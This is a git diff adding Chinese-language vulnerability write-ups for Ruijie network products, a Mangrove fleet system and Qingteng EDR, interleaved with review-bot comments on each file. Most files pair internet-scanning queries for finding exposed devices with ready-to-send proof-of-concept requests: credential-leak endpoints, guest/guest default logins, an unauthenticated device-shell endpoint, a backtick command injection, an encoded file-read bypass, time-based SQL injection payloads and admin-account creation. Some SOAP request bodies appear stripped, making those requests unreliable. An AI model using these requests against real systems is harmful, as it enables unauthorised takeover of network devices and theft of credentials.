+++ b/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md @@ -0,0 +1,29 @@ +# 锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/PWRvl7dZB_p9dP8f/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-803916.png) + +# 四、漏洞复现 +```plain +/get_dkey.php?user=admin +``` + +![1711942654983-81767f2d-af9a-4c55-a6bf-54ccc7d257aa.png](./img/PWRvl7dZB_p9dP8f/1711942654983-81767f2d-af9a-4c55-a6bf-54ccc7d257aa-619723.png) + +![1711942773077-d328619f-9fe1-49f8-88bb-da5a39b5859e.png](./img/PWRvl7dZB_p9dP8f/1711942773077-d328619f-9fe1-49f8-88bb-da5a39b5859e-257062.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RGSSLVPN垂直越权漏洞.md b/锐捷RGSSLVPN垂直越权漏洞.md new file mode 100644 index 0000000..4a10d94 --- /dev/null +++ b/锐捷RGSSLVPN垂直越权漏洞.md 
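Review bot: the two hunks here (`...信息泄漏漏洞.md` and `...账号密码泄漏漏洞.md`) carry a word-for-word identical 漏洞简介 but describe different exposure paths (the `super_admin` field found in page source via `F12` versus the `/get_dkey.php?user=admin` response), and neither says whether the returned credential is plaintext or a hash. State how the two differ, what `get_dkey.php` actually returns, and add a mitigation (strip credentials from client-side resources, restrict `get_dkey.php`); the single-item numbered list `1.` in the first file should be a plain paragraph.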
@@ -0,0 +1,70 @@ +# 锐捷RG SSL VPN 垂直越权漏洞 + +**一、漏洞简介** + +Ruijie SSL VPN 存在越权访问漏洞,攻击者在已知用户名的情况下,可以对账号进行修改密码和绑定手机的操作。并在未授权的情况下查看服务器资源 + +**二、影响版本** +锐捷RG SSL VPN +**三、资产测绘** + +fofa`icon_hash="884334722" || title="Ruijie SSL VPN"` +●登录页面![1716003142340-e37abdfb-2331-46bd-9184-8f06ccc163f8.png](./img/rnV_dT0P-F2gQ0uU/1716003142340-e37abdfb-2331-46bd-9184-8f06ccc163f8-202983.png) + + +**四、漏洞复现** + +```plain +/cgi-bin/main.cgi?oper=getrsc +``` + +直接访问,回显如下: + +![1716002869509-8022ac2f-2774-470e-a9a5-c0a6eddcb6e4.png](./img/rnV_dT0P-F2gQ0uU/1716002869509-8022ac2f-2774-470e-a9a5-c0a6eddcb6e4-567977.png) + +随后访问如下,UserName 参数为已知用户名 在未知登录用户名的情况下 漏洞无法利用(根据请求包使用Burp进行用户名爆破) + +```plain +/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=name&sid=1614345312&oper=showres +``` + +![1716003540683-111e6aa4-2326-44c7-bfaf-ac707445a34b.png](./img/rnV_dT0P-F2gQ0uU/1716003540683-111e6aa4-2326-44c7-bfaf-ac707445a34b-026112.png) + +查看服务器资源POC: + +```plain +GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1 +Host: 127.0.0.1 +Connection: close +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Cookie: UserName=name; SessionId=1; FirstVist=1; Skin=1; tunnel=1 +``` + +![1716003718786-1772a9c9-e1e3-4d28-b214-4a3f675b8f85.png](./img/rnV_dT0P-F2gQ0uU/1716003718786-1772a9c9-e1e3-4d28-b214-4a3f675b8f85-584396.png) + +通过此方法知道用户名后可以通过漏洞修改账号参数,访问 + +```plain +/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres +``` + 
+![1716003925237-08d888f1-6d4f-4ff1-b393-80e22421595c.png](./img/rnV_dT0P-F2gQ0uU/1716003925237-08d888f1-6d4f-4ff1-b393-80e22421595c-256764.png) + +点击个人设置跳转页面即可修改账号信息 + +![1716003942414-7766703a-9795-4795-8397-40b3ed33cfa1.png](./img/rnV_dT0P-F2gQ0uU/1716003942414-7766703a-9795-4795-8397-40b3ed33cfa1-770431.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷Smartweb管理系统命令注入漏洞.md b/锐捷Smartweb管理系统命令注入漏洞.md new file mode 100644 index 0000000..45433eb --- /dev/null +++ b/锐捷Smartweb管理系统命令注入漏洞.md 
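Review bot: the URL `/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=name&sid=1614345312&oper=showres` carries the `oper` parameter twice with different values and the text never says which one the CGI honours, so the request as documented is ambiguous. The second example substitutes `username=liuw`, which reads like a real account from a live target; use the same placeholder as the first example. The section headers are bold lines with no blank lines around them (`**二、影响版本**` runs straight into the product name), unlike the `#` headings used by the rest of the repository, and there is no mitigation section.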
@@ -0,0 +1,65 @@ +# 锐捷 Smartweb管理系统 命令注入漏洞 + +# 一、漏洞描述 +锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。 + +# 二、影响版本 ++ 锐捷网络股份有限公司 无线smartweb管理系统 + +# 三、资产测绘 +```java +hunterapp.name="Ruijie 锐捷 Smartweb" +fofa:title="无线smartWeb--登录页面" +``` + ++ 登录页面 + +![1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c.png](./img/tBfsUhE5mcdw2hI_/1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c-041676.png) + +1.执行查看用户名和密码POC,show webmaster users得到回显 + +```plain +POST /WEB_VMS/LEVEL15/ HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= +Content-Length: 81 +DNT: 1 +Connection: close +Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302 + +command=show webmaster users&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. +``` + +![1710773613327-d46e7ef8-c09c-4f7d-8b63-03f19fec9789.png](./img/tBfsUhE5mcdw2hI_/1710773613327-d46e7ef8-c09c-4f7d-8b63-03f19fec9789-719275.png) + +base64解码后登录系统 + +![1710773670682-afc5a16e-fac1-4963-b723-b5b09ab69f6c.png](./img/tBfsUhE5mcdw2hI_/1710773670682-afc5a16e-fac1-4963-b723-b5b09ab69f6c-380750.png) + +可执行其它命令 + +```plain +show running-config 查看当前生效的配置信息 +show interface fastethernet 0/3 查看F0/3端口信息 +show interface serial 1/2 查看S1/2端口信息 +show interface 查看所有端口信息 +show ip interface brief 以简洁方式汇总查看所有端口信息 +show ip interface 查看所有端口信息 +show version 查看版本信息 + +锐捷交换机命令参考: +https://www.bilibili.com/read/cv12330628 +``` + +![1710773800917-a83c0375-e631-4ae2-a877-a5ae979a7d3b.png](./img/tBfsUhE5mcdw2hI_/1710773800917-a83c0375-e631-4ae2-a877-a5ae979a7d3b-014295.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file 
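Review bot: the request authenticates with `Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=` and `Cookie: ... user=guest`, i.e. the built-in guest account, but 漏洞描述 presents this as a plain remote command execution; the precondition (default guest credentials) and the fact that the executed commands are device CLI `show` commands in `PRIV_EXEC` mode rather than OS shell commands should be stated, since that changes both severity and fix (disable the guest account, restrict `/WEB_VMS/LEVEL15/`). The 资产测绘 block is fenced with the `java` tag for plain search syntax and `hunterapp.name=...` lacks the separator used elsewhere; a `# 四、漏洞复现` heading is missing before `1.执行查看用户名和密码POC`.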
diff --git a/锐捷Smartweb管理系统密码信息泄漏漏洞.md b/锐捷Smartweb管理系统密码信息泄漏漏洞.md new file mode 100644 index 0000000..52c646e --- /dev/null +++ b/锐捷Smartweb管理系统密码信息泄漏漏洞.md @@ -0,0 +1,39 @@ +# 锐捷 Smartweb管理系统密码信息泄漏漏洞 + +# 一、漏洞描述 +锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 + +# 二、影响版本 ++ 锐捷网络股份有限公司 无线smartweb管理系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 Smartweb"` ++ 登录页面 + +![1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c.png](./img/oFjWwQcPR9lcz4hK/1693026690199-64fbe35e-4db9-4483-9ff4-60fd93531a2c-137226.png) + +# 四、漏洞复现 +1. 使用默认口令`guest/guest`登录系统 + +![1693026732018-95d1a5fe-3731-47f8-8189-98cdf821d914.png](./img/oFjWwQcPR9lcz4hK/1693026732018-95d1a5fe-3731-47f8-8189-98cdf821d914-202998.png) + +2. 使用poc获取管理员`admin`账号密码 + +```plain +http://xx.xx.xx.xx/web/xml/webuser-auth.xml +``` + +![1693026854163-84e6635e-5d9e-4385-8fa9-f31a26f91988.png](./img/oFjWwQcPR9lcz4hK/1693026854163-84e6635e-5d9e-4385-8fa9-f31a26f91988-063470.png) + +3. base64解码后获取账号密码 + +![1693026884669-f6bba353-350f-48bc-b932-424eb8363d40.png](./img/oFjWwQcPR9lcz4hK/1693026884669-f6bba353-350f-48bc-b932-424eb8363d40-016540.png) + +4. 使用获取的管理账号admin登录系统 + +![1693026933284-ae25c0ab-b1fb-448a-8f3b-60bd2c8b9798.png](./img/oFjWwQcPR9lcz4hK/1693026933284-ae25c0ab-b1fb-448a-8f3b-60bd2c8b9798-589008.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md b/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md new file mode 100644 index 0000000..3cbf941 --- /dev/null +++ b/锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md 
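Review bot: this file and the next (`...密码信息泄露漏洞CNVD-2021-17369.md`) document the same issue: identical 漏洞描述, the same `guest/guest` login step and the same `/web/xml/webuser-auth.xml` endpoint. Keep one file carrying the CNVD identifier and fold the screenshots into it, or state explicitly what differs. Step `3. base64解码后获取账号密码` implies the XML stores credentials merely base64-encoded; say so in the description, as that is the actual defect a fix has to address.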
@@ -0,0 +1,35 @@ +# 锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 + +**一、漏洞简介** +锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 +**二、影响版本** +锐捷网络股份有限公司 无线smartweb管理系统 +**三、资产测绘** +●hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif" +●登录页面 + + +![1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png](./img/-3rJ7WzmMGCuOLN8/1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387-027436.webp) + + +**四、漏洞复现** +使用默认口令guest/guest登录系统 + +![1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567.png](./img/-3rJ7WzmMGCuOLN8/1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567-711528.png) + +之后访问 + +```java +/web/xml/webuser-auth.xml +``` + +![1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9.png](./img/-3rJ7WzmMGCuOLN8/1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9-191395.png) + +base64解码解密后登录admin权限后台 + +![1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b.png](./img/-3rJ7WzmMGCuOLN8/1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b-444894.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷云课堂主机存在目录遍历漏洞.md b/锐捷云课堂主机存在目录遍历漏洞.md new file mode 100644 index 0000000..d852a0d --- /dev/null +++ b/锐捷云课堂主机存在目录遍历漏洞.md @@ -0,0 +1,28 @@ +# 锐捷云课堂主机存在目录遍历漏洞 + +**一、漏洞简介** +锐捷云课堂主机存在目录遍历漏洞 +**二、影响版本** + +锐捷云课堂主机 + +**三、资产测绘** + +```plain +body="云课堂主机" +``` + +●登录页面![1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05.png](./img/3K-g8lr70TGifHPH/1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05-289991.png) + +**四、漏洞复现** + +```plain +/webgl.data +``` + +![1711904751591-c8b9ed38-de19-41d7-90c7-99eb0bc1fd49.png](./img/3K-g8lr70TGifHPH/1711904751591-c8b9ed38-de19-41d7-90c7-99eb0bc1fd49-598754.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md b/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md new file mode 100644 index 0000000..6af993e --- /dev/null +++ b/锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md 
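Review bot: in the 锐捷云课堂主机 hunk the 漏洞简介 only repeats the title and the PoC is a single fixed path `/webgl.data`, which demonstrates an exposed file rather than 目录遍历; either show the traversal or retitle the file, and add an 影响版本 entry. In the CNVD-2021-17369 hunk the `●hunterweb.body=...` line is missing the separator between platform name and query, a URL path is fenced with the `java` tag, and the content duplicates the preceding Smartweb file.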
@@ -0,0 +1,36 @@ +# 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞 + +# 一、漏洞简介 +锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 + +# 二、影响版本 ++ 锐捷交换机 WEB 管理系统 + +# 三、资产测绘 ++ hunter`web.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"` ++ 登录页面 + +![1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png](./img/HsfISm4uJkaUTn7g/1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387-471626.png) + +# 四、漏洞复现 +```plain +GET /EXCU_SHELL HTTP/1.1 +Cmdnum: 1 +Command1: show running-config +Confirm1: n +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1693030750176-4431bab4-1796-4604-a4e5-40c3f8bb5936.png](./img/HsfISm4uJkaUTn7g/1693030750176-4431bab4-1796-4604-a4e5-40c3f8bb5936-223418.png) + +使用获取的账号密码成功登录系统 + +![1693030780834-da105fd0-c0a5-483f-a016-d1a47499cc5e.png](./img/HsfISm4uJkaUTn7g/1693030780834-da105fd0-c0a5-483f-a016-d1a47499cc5e-719318.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md new file mode 100644 index 0000000..2438f56 --- /dev/null +++ b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md 
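Review bot: the request sends `Command1: show running-config` to `/EXCU_SHELL` with no `Authorization` or `Cookie` header, so the document should say explicitly that the endpoint is reachable unauthenticated; that is the key fact for triage and for the missing mitigation section. The asset fingerprint `web.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"` is identical to the Smartweb CNVD-2021-17369 file, so the two product names (交换机WEB管理系统 vs Smartweb) need reconciling, and `User-Agent: Java/1.8.0_381` is a captured tool artefact better replaced with a placeholder.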
@@ -0,0 +1,27 @@ +## 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过 + +校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞补丁绕过,通过将`view`编码即可绕过 + +## fofa + +```javascript +body="校园网自助服务系统" +``` + +## poc + +```javascript +GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?vie%77=./WEB-INF/web.xml%3F HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + + +``` + +![image-20241025112954677](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251129745.png) + +![image-20241025112527256](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251125343.png) \ No newline at end of file diff --git a/锐捷系统接口auth存在远程命令执行漏洞.md b/锐捷系统接口auth存在远程命令执行漏洞.md new file mode 100644 index 0000000..f33f736 --- /dev/null +++ b/锐捷系统接口auth存在远程命令执行漏洞.md @@ -0,0 +1,26 @@ +# 锐捷系统接口auth存在远程命令执行漏洞 + +锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞,攻击者可以任意执行服务器端的代码,编写后门,获得服务器权限,进而控制整个web服务器。 + +## fofa + +```javascript +body="cgi-bin/luci" && body="#f47f3e" +``` + +## poc + +```javascript +POST /cgi-bin/luci/api/auth HTTP/1.1 +Host:  +Content-Type: application/json +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +{"method":"checkNet","params":{"host":"`echo c149136B>AD0D5b8c.txt`"}} +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Vh64WEnrIDBBsZ6EuJqx4Q \ No newline at end of file diff --git a/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md b/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md new file mode 100644 index 0000000..5168731 
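Review bot: `...login_judge.jsf任意文件读取漏洞补丁绕过.md` calls this a 补丁绕过 but never identifies the original vulnerability or the patched version it bypasses, so a reader cannot tell which builds are affected; cite the original advisory and the version tested, and put the one-line explanation already given (`通过将view编码即可绕过`, i.e. `vie%77=`) next to the request rather than only above the fofa block. In the `...auth存在远程命令执行漏洞.md` hunk the only source is a WeChat link and there is no 影响版本 or mitigation. Both hunks fence HTTP requests with the `javascript` tag.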
--- /dev/null +++ b/锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md 
@@ -0,0 +1,75 @@ +# 锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞 + +# 一、漏洞简介 +锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞。 + +# 二、影响版本 ++ 锐捷网络股份有限公司校园网自助服务系统 + +# 三、资产测绘 ++ hunter`app="校园网自助服务系统"` ++ 特征 + +![1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027.png](./img/XdtS24xhzMy-H1dt/1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027-944527.png) + +# 四、漏洞复现 +```http +POST /selfservice/service/operatorReportorRoamService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: JSESSIONID=81AA808BC6E57EE95C343DD3FCB89394 +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 399 + + + + + + + gero et';WAITFOR DELAY '0:0:5'-- + + + +``` + +![1715606526425-645ee7d6-4644-4073-8d7f-4039afa5c77b.png](./img/XdtS24xhzMy-H1dt/1715606526425-645ee7d6-4644-4073-8d7f-4039afa5c77b-966318.png) + +sqlmap + +```http +POST /selfservice/service/operatorReportorRoamService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: JSESSIONID=81AA808BC6E57EE95C343DD3FCB89394 +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 399 + + + + + + + gero et + + + +``` + +![1715606556821-efc3d9e8-e3b4-420d-b2fa-b0b98e12fd92.png](./img/XdtS24xhzMy-H1dt/1715606556821-efc3d9e8-e3b4-420d-b2fa-b0b98e12fd92-988323.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file 
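Review bot: the SOAP body in both requests has lost its XML envelope in this copy: only the bare text `gero et';WAITFOR DELAY '0:0:5'--` (and `gero et` in the sqlmap variant) survives between blank lines, so `Content-Length: 399` cannot match what is shown and the request is not reproducible as written. Restore the envelope around the `findOperatorOnlineUserCount24Hours` element named in the title, fill `Host:`, and replace the captured `JSESSIONID` with a placeholder. The `sqlmap` subsection shows a request file with no indication of how it is consumed, and the file has no 修复建议 (the `WAITFOR DELAY` syntax identifies SQL Server, which belongs in the 简介).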
diff --git a/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md b/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md new file mode 100644 index 0000000..b0eaaa7 --- /dev/null +++ b/锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md 
@@ -0,0 +1,95 @@ +# 锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞 + +# 一、漏洞简介 +锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞。 + +# 二、影响版本 ++ 锐捷网络股份有限公司校园网自助服务系统 + +# 三、资产测绘 ++ hunter`app="校园网自助服务系统"` ++ 特征 + +![1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027.png](./img/VkEN-dwHXTrP9O5n/1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027-798744.png) + +# 四、漏洞复现 +```plain +POST /selfservice/service/operatorReportorRoamService HTTP/1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB +Connection: close +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 873 + + + + + + + + 2008-09-29T09:49:45 + + 3 + + 3 + + aeoliam venit';WAITFOR DELAY '0:0:5'-- + + 2014-06-09T23:15:04+08:00 + + + + +``` + +![1713339788088-ab68d76f-65e0-4f00-beae-f05e2e7d6fad.png](./img/VkEN-dwHXTrP9O5n/1713339788088-ab68d76f-65e0-4f00-beae-f05e2e7d6fad-278254.png) + +sqlmap + +```plain +POST /selfservice/service/operatorReportorRoamService HTTP/1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB +Connection: close +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 873 + + + + + + + 
+ 2008-09-29T09:49:45 + + 3 + + 3 + + aeoliam venit + + 2014-06-09T23:15:04+08:00 + + + + +``` + +![1713339819071-b490ef2d-3d5c-4618-9666-2b16a9bd8972.png](./img/VkEN-dwHXTrP9O5n/1713339819071-b490ef2d-3d5c-4618-9666-2b16a9bd8972-518241.png) + + + +> 更新: 2024-06-24 11:42:27 +> 原文: \ No newline at end of file diff --git a/锐明技术Mangrove系统任意用户创建漏洞.md b/锐明技术Mangrove系统任意用户创建漏洞.md new file mode 100644 index 0000000..5e6033f --- /dev/null +++ b/锐明技术Mangrove系统任意用户创建漏洞.md @@ -0,0 +1,27 @@ +## 锐明技术Mangrove系统任意用户创建漏洞 + +锐明技术Mangrove系统任意用户创建漏洞,远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +``` +body="Mvsp/RegisterLogin/Default.do" +``` + +## poc + +```javascript +POST /Mvsp/RoleUserInfo/Default.do?Action=CreateUser&Type=post&DataType=Text&Guid=1721290869914 HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Cookie: MVSP.U=VUlEPTEmVU49YWRtaW4yJkdJRD0xJlJJRD0x; +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 + +UserId=&GroupPower=1&VehiclePower=&UserName=poiuy&RoleId=1&GroupId=1&ValidTime=&VideoTime=1&Enable=1&TelNo=1&Flow=&WarningFlow=&RealFlow=&MonthlyTime=&Description=&Email=&Password=test1234 +``` + +![image-20241012131926688](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121319743.png) \ No newline at end of file diff --git a/青藤云-EDR-权限提升漏洞.md b/青藤云-EDR-权限提升漏洞.md new file mode 100644 index 0000000..e5a2dca --- /dev/null +++ b/青藤云-EDR-权限提升漏洞.md 
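Review bot: as in the findOperatorOnlineUserCount24Hours file, the SOAP envelope in both requests has been stripped to loose values (`2008-09-29T09:49:45`, `3`, `3`, `aeoliam venit';WAITFOR DELAY '0:0:5'--`, `2014-06-09T23:15:04+08:00`), so the element names are unknown and `Content-Length: 873` cannot be right for what is shown; the `Cookie:` line also carries two different `JSESSIONID` values, a capture artefact. In the 锐明技术Mangrove hunk the request's only credential is the `Cookie: MVSP.U=...` value and the text never says what authorization `RoleUserInfo/Default.do?Action=CreateUser` performs, which is the root cause that needs documenting alongside the missing 影响版本 and mitigation; `UserName=poiuy` and `Password=test1234` should be marked as test values.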
@@ -0,0 +1,29 @@ +## 青藤云 EDR 权限提升漏洞 +``` +青藤的测试 POC +local function save_python_info(ctx, info_table) +local proc_names = {"python.exe"} +local procs_ret = ctx.get_proc_list_info_rely(ctx, proc_names) +if next(procs_ret) == nil then +return +end +-- call get version +-- ... 省略无关代码 +get_python_ver(proc) -- ... 省略无关代码 +end +function get_python_ver(proc) +if proc == nil then +return "" end + +if file_api.file_exists(proc.path) then +local cmdline = "\"" .. proc.path .. "\" -V" +local ret, output = common.execute_shell(cmdline) +if ret == 0 and output and output ~= "" then +return regex.match(output, "\\d.+\\d") +else +agent.error_log("get python version info error:" .. tostring(ret)) +return "" end +end +End + +``` diff --git a/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md b/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..dff4e35 --- /dev/null +++ b/青铜器RDM研发管理平台upload存在任意文件上传漏洞.md 
